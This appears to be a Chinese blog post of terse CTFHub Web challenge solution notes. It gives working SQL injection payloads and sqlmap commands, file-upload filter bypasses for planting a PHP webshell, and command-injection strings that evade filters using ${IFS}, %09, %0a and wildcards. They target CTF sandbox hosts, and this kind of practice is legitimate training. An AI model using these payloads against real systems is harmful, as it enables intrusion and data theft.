【CTFHUB】Web技能树

Web

HTTP协议

请求方式

302跳转

cookie

基础认证

响应包源代码

信息泄露

目录遍历

phpinfo

备份文件下载

网站源码

bak文件

vim缓存

下载下来放到linux中

在文件前面加的点(.)   .index.php.swp

然后运行 vi -r index.php

.DS_Store

记事本打开

Git泄露

Log

python git_extract.py http://challenge-8cff71d12c02de35.sandbox.ctfhub.com:10080/.git/

Stash

同上

 

Index

同上

SVN泄露

使用dvcs-ripper工具

HG泄露

使用dvcs-ripper工具

密码口令

弱口令

admin 123456

默认口令

百度搜索亿邮邮件网关默认口令

SQL注入

整数型注入

字符型注入

报错注入

extractvalue函数报错:       1 and ( extractvalue( 'anything',concat( '~', (select database()) ) ) );

updatexml函数报错:          1 and updatexml(1,concat(0x7e,(select database()),0x7e),1)

只能显示32位:

substr(字符串,开始位置,长度)

布尔盲注

sqlmap

sqlmap -u " http://challenge-520521e9124c0be8.sandbox.ctfhub.com:10080/?id=1 " --dbs -technique B

数据库 sqli   表 flag   字段 flag

时间盲注

sqlmap

sqlmap -u " http://challenge-58442e11e1306e17.sandbox.ctfhub.com:10080/?id=1 " --dbs -technique T

MySQL结构

-1 union select 1, group_concat(djbtjjrnuq) from sqli.pqfzaflkkt;

cookie注入

sqlmap -u " http://challenge-52d3494f9e4a406f.sandbox.ctfhub.com:10080/ " --cookie "id=1" --level 2 --dbs

UA注入

user-agent:   -1 union select 1,group_concat(hddxcgzzsv) from sqli.bgerzmdwpi;#

sqlmap: 

sqlmap -u " http://challenge-f7a6b5d5665981cc.sandbox.ctfhub.com:10080/ " --user-agent "123" --level 3 --dbs -technique U --dbms

Refer注入

同上,只不过在referer中输入SQL语句

XSS

反射型

文件上传

无验证

前端验证

把PHP文件后缀改为jpg,抓包再改回php

.htaccess

上传.htaccess和hhh.jpg

MIME绕过

正常上传,抓包,将content-type改为 image/jpeg

00截断

双写后缀

文件头检测

将一句话马改为jpg后缀,抓包,修改后缀为php,并添加gif头

RCE

命令注入

127.0.0.1 & ls

过滤cat

127.0.0.1 & more flag_162822816029866.php

过滤空格

使用${IFS}代替空格(可以代替空格的有IFS$9、%09、%0a、<、>、<>、{,}、${IFS}等)

过滤目录分隔符

使用;符号分割命令

127.0.0.1 & ls

发现flag_is_here目录

127.0.0.1 & cd flag_is_here;ls

发现flag_44052408916433.php文件

127.0.0.1& cd flag_is_here;ls;cat flag_44052408916433.php

查看源代码得到flag

过滤运算符

127.0.0.1 ; cat flag_991932693945.php

综合过滤练习

过滤了|,&,;, ,/,cat,flag,ctfhub

%0a(换行符)可以代替;符号,但是要在url处输入,不然会被再次转义

%09或者${IFS}等,可以替代空格

通配符 *   ?

127.0.0.1%09%0a%09cd%09fla?_is_here%0amore%09fla?_260832613315632.php#

我来评几句
登录后评论

已发表评论数()

相关站点

热门文章